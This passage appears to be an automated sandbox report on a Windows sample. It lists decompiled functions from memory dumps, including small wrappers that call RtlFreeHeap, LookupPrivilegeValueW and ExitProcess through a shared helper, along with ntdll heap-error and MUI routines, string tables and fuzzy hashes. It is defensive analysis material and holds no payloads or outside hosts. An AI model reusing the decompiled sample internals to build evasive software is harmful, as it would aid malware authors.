API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 571e272b84f2c0582f5d07763a21c756865336111402984029b1992e788dc788
Instruction ID: 7b322570884be9d1901fbf083d7eae14b5881d9ed771f298676728567c5c8436
Opcode Fuzzy Hash: 571e272b84f2c0582f5d07763a21c756865336111402984029b1992e788dc788
Instruction Fuzzy Hash: 36F030B66002147FDB21DF44CC55EEB37689F49650F118156F9085B252C534AE45C7F5

Uniqueness

Uniqueness Score: -1.00%

Function 004188F0, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004188F0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E004191E0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x004188ff
0x00418907
0x0041891d
0x00418921

APIs

RtlFreeHeap.NTDLL(00000060,00408B13,?,?,00408B13,00000060,00000000,00000000,?,?,00408B13,?,00000000), ref: 0041891D

Memory Dump Source

Source File: 00000003.00000002.745321491.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: 4eb6e808868848e44fc4af0a2d328e43ee2ba6839a30e24a5e1d9ea2c08b961d
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: 6BE012B1200209ABDB18EF99CC49EA777ACAF88750F018559FA085B242CA30E910CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 00418A50, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00418A50(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				intOrPtr* _t8;
				int _t10;
				void* _t15;

				_t8 = E004191E0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_pop(es);
				 *_t8 =  *_t8 + _t8;
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}

0x00418a6a
0x00418a6c
0x00418a6d
0x00418a80
0x00418a84

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFC2,0040CFC2,00000041,00000000,?,00408B85), ref: 00418A80

Memory Dump Source

Source File: 00000003.00000002.745321491.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: 6b795ac81b365ad13cf9f2a9b204a9737006b755962b409e964d21a2d06fa60d
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 62E01AB12002086BDB10DF49CC85EE737ADAF88650F018155FA0857241C934E950CBF5

Uniqueness

Uniqueness Score: -1.00%

Function 00418930, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418930(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E004191E0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}

0x00418933
0x0041894a
0x00418958

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418958

Memory Dump Source

Source File: 00000003.00000002.745321491.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: c6ffa8f41277cedcd146721b33de4ab2dd662f0a832426917f21051448e796de
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 90D012716042147BD620DB99CC85FD7779CDF48790F018065FA1C5B241C531BA00C6E1

Uniqueness

Uniqueness Score: -1.00%

Function 011F967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 011F9694

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f41bfb187bfef27cc29d7af5ac7e4685e97214fea0a091e913bc756e96229912
Instruction ID: 770a2c9fa82dfa6532b6f004ef00ef20b8c7f378561e744f0aa54d07ca1045a9
Opcode Fuzzy Hash: f41bfb187bfef27cc29d7af5ac7e4685e97214fea0a091e913bc756e96229912
Instruction Fuzzy Hash: 88B09BB19024C9C5D716E7F546087177A007BD0755F16C155E2020645B8778C091F6B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0126B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON

Download Yara Rule

Strings

Go determine why that thread has not released the critical section., xrefs: 0126B3C5
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0126B38F
The instruction at %p tried to %s , xrefs: 0126B4B6
This failed because of error %Ix., xrefs: 0126B446
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0126B323
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0126B305
The resource is owned shared by %d threads, xrefs: 0126B37E
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0126B476
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0126B314
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 0126B39B
The resource is owned exclusively by thread %p, xrefs: 0126B374
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0126B2DC
write to, xrefs: 0126B4A6
*** A stack buffer overrun occurred in %ws:%s, xrefs: 0126B2F3
*** enter .cxr %p for the context, xrefs: 0126B50D
a NULL pointer, xrefs: 0126B4E0
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0126B47D
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0126B53F
*** then kb to get the faulting stack, xrefs: 0126B51C
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0126B3D6
<unknown>, xrefs: 0126B27E, 0126B2D1, 0126B350, 0126B399, 0126B417, 0126B48E
The instruction at %p referenced memory at %p., xrefs: 0126B432
an invalid address, %p, xrefs: 0126B4CF
*** enter .exr %p for the exception record, xrefs: 0126B4F1
The critical section is owned by thread %p., xrefs: 0126B3B9
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0126B484
*** An Access Violation occurred in %ws:%s, xrefs: 0126B48F
*** Resource timeout (%p) in %ws:%s, xrefs: 0126B352
*** Inpage error in %ws:%s, xrefs: 0126B418
read from, xrefs: 0126B4AD, 0126B4B2

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: 61f8708d8e72a1c06871ad2e397378741a0c07d34f947b4a49d226c26c1fa346
Instruction ID: 7bafa749d75839ec12d1e26e376cc42e751ba41c81839e851ceba99e4319d27f
Opcode Fuzzy Hash: 61f8708d8e72a1c06871ad2e397378741a0c07d34f947b4a49d226c26c1fa346
Instruction Fuzzy Hash: 14811339B60211BFDB2D9B4A9C46E7B3F29EF56651F800058F604AF192D3A18492C6B2

Uniqueness

Uniqueness Score: -1.00%

Function 01271C06, Relevance: 31.4, Strings: 25, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E01271C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x11948a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E011BB150();
				} else {
					E011BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x12a589c);
				E011BB150("Heap error detected at %p (heap handle %p)\n",  *0x12a58a0);
				_t27 =  *0x12a5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M01271E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E011BB150();
				} else {
					E011BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E011BB150("Error code: %d - %s\n",  *0x12a5898);
				_t113 =  *0x12a58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E011BB150();
					} else {
						E011BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E011BB150("Parameter1: %p\n",  *0x12a58a4);
				}
				_t115 =  *0x12a58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E011BB150();
					} else {
						E011BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E011BB150("Parameter2: %p\n",  *0x12a58a8);
				}
				_t117 =  *0x12a58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E011BB150();
					} else {
						E011BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E011BB150("Parameter3: %p\n",  *0x12a58ac);
				}
				_t119 =  *0x12a58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E011BB150();
					} else {
						E011BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x12a58b4);
					E011BB150("Last known valid blocks: before - %p, after - %p\n",  *0x12a58b0);
				} else {
					_t120 =  *0x12a58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E011BB150();
				} else {
					E011BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E011BB150("Stack trace available at %p\n", 0x12a58c0);
			}

0x01271c10
0x01271c16
0x01271c1e
0x01271c3d
0x01271c3e
0x01271c20
0x01271c35
0x01271c3a
0x01271c44
0x01271c55
0x01271c5a
0x01271c65
0x01271c67
0x00000000
0x01271c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x01271c67
0x01271cdc
0x01271ce5
0x01271d04
0x01271d05
0x01271ce7
0x01271cfc
0x01271d01
0x01271d0b
0x01271d17
0x01271d1f
0x01271d25
0x01271d30
0x01271d4f
0x01271d50
0x01271d32
0x01271d47
0x01271d4c
0x01271d61
0x01271d67
0x01271d68
0x01271d6e
0x01271d79
0x01271d98
0x01271d99
0x01271d7b
0x01271d90
0x01271d95
0x01271daa
0x01271db0
0x01271db1
0x01271db7
0x01271dc2
0x01271de1
0x01271de2
0x01271dc4
0x01271dd9
0x01271dde
0x01271df3
0x01271df9
0x01271dfa
0x01271e00
0x01271e0a
0x01271e13
0x01271e32
0x01271e33
0x01271e15
0x01271e2a
0x01271e2f
0x01271e39
0x01271e4a
0x01271e02
0x01271e02
0x01271e08
0x00000000
0x00000000
0x01271e08
0x01271e5b
0x01271e7a
0x01271e7b
0x01271e5d
0x01271e72
0x01271e77
0x01271e95

Strings

HEAP[%wZ]: , xrefs: 01271C30, 01271CF7, 01271D42, 01271D8B, 01271DD4, 01271E25, 01271E6D
heap_failure_generic, xrefs: 01271C7C
heap_failure_cross_heap_operation, xrefs: 01271CC2
Parameter2: %p, xrefs: 01271DA5
Heap error detected at %p (heap handle %p), xrefs: 01271C50
heap_failure_freelists_corruption, xrefs: 01271CC9
Parameter1: %p, xrefs: 01271D5C
heap_failure_block_not_busy, xrefs: 01271CA6
heap_failure_invalid_argument, xrefs: 01271CAD
heap_failure_buffer_overrun, xrefs: 01271C98
heap_failure_virtual_block_corruption, xrefs: 01271C91
HEAP: , xrefs: 01271C16, 01271C3D, 01271D04, 01271D4F, 01271D98, 01271DE1, 01271E32, 01271E7A
heap_failure_buffer_underrun, xrefs: 01271C9F
heap_failure_invalid_allocation_type, xrefs: 01271CB4
Stack trace available at %p, xrefs: 01271E86
Error code: %d - %s, xrefs: 01271D12
heap_failure_entry_corruption, xrefs: 01271C83
heap_failure_multiple_entries_corruption, xrefs: 01271C8A
heap_failure_listentry_corruption, xrefs: 01271CD0
heap_failure_lfh_bitmap_mismatch, xrefs: 01271CD7
heap_failure_usage_after_free, xrefs: 01271CBB
heap_failure_unknown, xrefs: 01271C75
Last known valid blocks: before - %p, after - %p, xrefs: 01271E45
heap_failure_internal, xrefs: 01271C6E
Parameter3: %p, xrefs: 01271DEE

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID:
String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 0-2897834094
Opcode ID: 140ad40a95b3c2fd22cc2372ab541d217dd688dc6d79295cd7fd6ff4e89d671a
Instruction ID: b0b3a52a9ca07b1315b89cf58a836431163745f527e5220ec2723804573332c2
Opcode Fuzzy Hash: 140ad40a95b3c2fd22cc2372ab541d217dd688dc6d79295cd7fd6ff4e89d671a
Instruction Fuzzy Hash: 3B61073A536142DFC719AB8AF58AE2277A8EF04930B4D802EF50D6B701D7749C908F5E

Uniqueness

Uniqueness Score: -1.00%

Function 011C3D34, Relevance: 6.7, Strings: 5, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E011C3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E011C1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L011D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E011C1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L011D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E011C1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E011C1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E011C1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L011D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L011D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L011D4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E011FF3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E01201370(_t276, 0x1194e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E011FBB40(0,  &_v68, _t170);
									if(L011C43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L011D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L011D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E011FBB40(_t257,  &_v68, _t243);
								if(L011C43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E01201370(_t278, 0x1194e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L011D4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E011FF3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E01201370(_v16, 0x1194e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E011FBB40(_t262,  &_v68, _t244);
								if(L011C43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E01201370(_t282, 0x1194e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E011FBB40(_t262,  &_v68, _t201);
							if(L011C43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L011D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L011D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L011D4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E011FF3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E01201370(_t280, 0x1194e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E011FBB40(_t267,  &_v68, _t245);
							if(L011C43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E01201370(_t284, 0x1194e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E011FBB40(_t267,  &_v68, _t224);
						if(L011C43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L011D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L011D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x011c3d3c
0x011c3d42
0x011c3d44
0x011c3d46
0x011c3d49
0x011c3d4c
0x011c3d4f
0x011c3d52
0x011c3d55
0x011c3d58
0x011c3d5b
0x011c3d5f
0x011c3d61
0x011c3d66
0x01218213
0x01218218
0x011c4085
0x011c4088
0x011c408e
0x011c4094
0x011c409a
0x011c40a0
0x011c40a6
0x011c40a9
0x011c40af
0x011c40b6
0x011c40bd
0x011c40bd
0x011c3d83
0x0121821f
0x01218229
0x01218238
0x01218238
0x0121823d
0x0121823d
0x011c3da0
0x011c3daf
0x011c3db5
0x011c3dba
0x011c3dba
0x011c3dd4
0x011c3e94
0x011c3eab
0x011c3f6d
0x011c3f84
0x011c406b
0x011c406b
0x011c406e
0x011c406e
0x011c4070
0x011c4074
0x01218351
0x01218351
0x011c407a
0x011c407f
0x0121835d
0x01218370
0x01218377
0x01218379
0x0121837c
0x0121837c
0x0121835d
0x00000000
0x011c407f
0x011c3f8a
0x011c3f8d
0x011c3f90
0x011c3f95
0x0121830d
0x0121830f
0x011c3f9b
0x011c3fac
0x011c3fae
0x011c3fb1
0x011c3fb1
0x011c3fb6
0x01218317
0x0121831a
0x00000000
0x011c3fbc
0x011c3fc1
0x011c3fc9
0x011c3fd7
0x011c3fda
0x011c3fdd
0x011c4021
0x011c4021
0x011c4029
0x011c4030
0x011c4044
0x011c4046
0x011c4046
0x011c4044
0x011c4049
0x01218327
0x01218334
0x01218339
0x0121833c
0x011c404f
0x011c404f
0x011c404f
0x011c4051
0x011c4056
0x011c4063
0x011c4063
0x011c4068
0x00000000
0x011c4068
0x011c3fdf
0x011c3fe2
0x011c3fe4
0x011c3fe7
0x011c3fef
0x011c4003
0x011c4005
0x011c4005
0x011c400c
0x011c4013
0x011c4016
0x011c4017
0x011c401b
0x011c401e
0x00000000
0x011c401e
0x011c3fb6
0x011c3eb1
0x011c3eb4
0x011c3eb7
0x011c3ebc
0x012182a9
0x012182ab
0x011c3ec2
0x011c3ed3
0x011c3ed5
0x011c3ed8
0x011c3ed8
0x011c3edd
0x012182b3
0x012182b6
0x00000000
0x011c3ee3
0x011c3ee8
0x011c3eed
0x011c3ef0
0x011c3ef3
0x011c3f02
0x011c3f05
0x011c3f08
0x012182c0
0x012182c3
0x012182c5
0x012182c8
0x012182d0
0x012182e4
0x012182e6
0x012182e6
0x012182ed
0x012182f4
0x012182f7
0x012182f8
0x012182fc
0x012182ff
0x012182ff
0x011c3f0e
0x011c3f11
0x011c3f16
0x011c3f1d
0x011c3f31
0x01218307
0x01218307
0x011c3f31
0x011c3f39
0x011c3f48
0x011c3f4d
0x011c3f50
0x011c3f50
0x011c3f53
0x011c3f58
0x011c3f65
0x011c3f65
0x011c3f6a
0x00000000
0x011c3f6a
0x011c3edd
0x011c3dda
0x011c3ddd
0x011c3de0
0x011c3de5
0x01218245
0x011c3deb
0x011c3df7
0x011c3dfc
0x011c3dfe
0x011c3e01
0x011c3e01
0x011c3e06
0x0121824d
0x0121824f
0x01218254
0x00000000
0x011c3e0c
0x011c3e11
0x011c3e16
0x011c3e19
0x011c3e29
0x011c3e2c
0x011c3e2f
0x0121825c
0x0121825f
0x01218261
0x01218264
0x0121826c
0x01218280
0x01218282
0x01218282
0x01218289
0x01218290
0x01218293
0x01218294
0x01218298
0x0121829b
0x0121829b
0x011c3e35
0x011c3e38
0x011c3e3d
0x011c3e44
0x011c3e58
0x012182a3
0x012182a3
0x011c3e58
0x011c3e60
0x011c3e6f
0x011c3e74
0x011c3e77
0x011c3e77
0x011c3e7a
0x011c3e7f
0x011c3e8c
0x011c3e8c
0x011c3e91
0x00000000
0x011c3e91

Strings

Kernel-MUI-Language-Allowed, xrefs: 011C3DC0
Kernel-MUI-Language-Disallowed, xrefs: 011C3E97
Kernel-MUI-Number-Allowed, xrefs: 011C3D8C
WindowsExcludedProcs, xrefs: 011C3D6F
Kernel-MUI-Language-SKU, xrefs: 011C3F70

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: a96155a141ca97557d853e02e07b9857ea4ae83be3d14b965453ed9b8585e995
Instruction ID: 4812dae8c38ecd7d9f0d327d7f51b1edd12d4276adaa26f45cf197cca78ca8a0
Opcode Fuzzy Hash: a96155a141ca97557d853e02e07b9857ea4ae83be3d14b965453ed9b8585e995
Instruction Fuzzy Hash: A6F19172D1461AEFCB1ADF98C980AEEBBF8FF18A40F15405AE905E7650D7349E01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 011B40E1, Relevance: 6.3, Strings: 5, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E011B40E1(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E011BB150();
					} else {
